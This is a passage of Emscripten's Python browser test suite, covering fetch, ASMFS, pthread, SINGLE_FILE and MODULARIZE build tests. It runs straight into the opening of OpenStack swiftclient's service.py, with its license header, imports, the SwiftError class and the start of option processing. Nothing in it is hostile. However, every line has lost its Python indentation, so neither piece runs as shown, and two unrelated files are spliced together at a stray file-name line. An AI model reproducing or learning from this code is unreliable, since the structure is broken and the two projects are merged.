for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_wasm_backend("fetch API uses an asm.js based web worker to run synchronous XHRs and IDB operations")
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9062')
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'MODULARIZE_INSTANCE=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9065')
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
if not os.path.exists(filesystem_path):
os.makedirs(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-std=c++11', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that it is possible to load two asm.js compiled programs to one page when both --separate-asm and MODULARIZE=1 is used, by assigning
# the pages different asm module names to ensure they do not conflict when being XHRed in.
@no_wasm_backend('this tests asm.js support')
def test_two_separate_asm_files_on_same_page(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'two_separate_asm_files.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page1.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module1', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage1["asm"]']
print(cmd)
subprocess.check_call(cmd)
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page2.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module2', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage2["asm"]']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
# Tests that it is possible to encapsulate asm.js compiled programs by using --separate-asm + MODULARIZE=1. See
# encapsulated_asmjs_page_load.html for the example.
@no_wasm_backend('this tests asm.js support')
def test_encapsulated_asmjs_page_load(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'encapsulated_asmjs_page_load.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'a.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=EmscriptenCode', '-s', 'SEPARATE_ASM_MODULE_NAME="var EmscriptenCode"']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
@requires_threads
@no_fastcomp('offset converter is not supported on fastcomp')
def test_offset_converter(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
|
service.py
|
# Copyright (c) 2010-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
import os
from collections import defaultdict
from concurrent.futures import as_completed, CancelledError, TimeoutError
from copy import deepcopy
from errno import EEXIST, ENOENT
from hashlib import md5
from os import environ, makedirs, stat, utime
from os.path import (
basename, dirname, getmtime, getsize, isdir, join, sep as os_path_sep
)
from posixpath import join as urljoin
from random import shuffle
from time import time
from threading import Thread
from six import Iterator, StringIO, string_types, text_type
from six.moves.queue import Queue
from six.moves.queue import Empty as QueueEmpty
from six.moves.urllib.parse import quote
import json
from swiftclient import Connection
from swiftclient.command_helpers import (
stat_account, stat_container, stat_object
)
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper, EMPTY_ETAG,
parse_api_response, report_traceback, n_groups, split_request_headers,
n_at_a_time, normalize_manifest_path
)
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import MultiThreadingManager
DISK_BUFFER = 2 ** 16
logger = logging.getLogger("swiftclient.service")
class ResultsIterator(Iterator):
def __init__(self, futures):
self.futures = interruptable_as_completed(futures)
def __iter__(self):
return self
def __next__(self):
next_completed_future = next(self.futures)
return next_completed_future.result()
class SwiftError(Exception):
def __init__(self, value, container=None, obj=None,
segment=None, exc=None):
self.value = value
self.container = container
self.obj = obj
self.segment = segment
self.exception = exc
def __str__(self):
value = repr(self.value)
if self.container is not None:
value += " container:%s" % self.container
if self.obj is not None:
value += " object:%s" % self.obj
if self.segment is not None:
value += " segment:%s" % self.segment
return value
def __repr__(self):
return str(self)
def process_options(options):
# tolerate sloppy auth_version
if options.get('auth_version') == '3.0':
options['auth_version'] = '3'
elif options.get('auth_version') == '2':
options['auth_version'] = '2.0'
if options.get('auth_version') not in ('2.0', '3') and not all(
options.get(key) for key in ('auth', 'user', 'key')):
# Use keystone auth if any of the new-style args are present
if any(options.get(k) for k in (
'os_user_domain_id',
'os_user_domain_name',
'os_project_domain_id',
